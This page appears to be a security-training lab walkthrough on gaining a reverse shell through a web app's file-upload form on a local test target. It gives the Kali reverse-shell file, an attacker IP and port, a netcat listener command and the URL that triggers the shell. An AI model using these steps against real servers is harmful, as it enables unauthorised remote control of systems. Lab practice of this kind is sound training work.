Web Shell

Lab 16: Command injection - Web Shell with Command injection

Go to upload file page form https://127.0.0.1/index.php?page=upload-file.php

Here we can upload a php reverse shell and custom one of the shells already present into kali linux distribution at the path: /usr/share/webshells/php (in my case i choose php-reverse-shell.php)

adding our Kali_IP (10.0.2.15) and choosing a port (1339), save and upload it.

Now we need to take in listening mode on the attacker machine via netcat: nc -lvnp 1339 and go to relative web page to run the reverse shell: https://127.0.0.1/index.php?page=/tmp/php-reverse-shell.php

PreviousExtracting User Accounts NextXSS

Last updated 19 days ago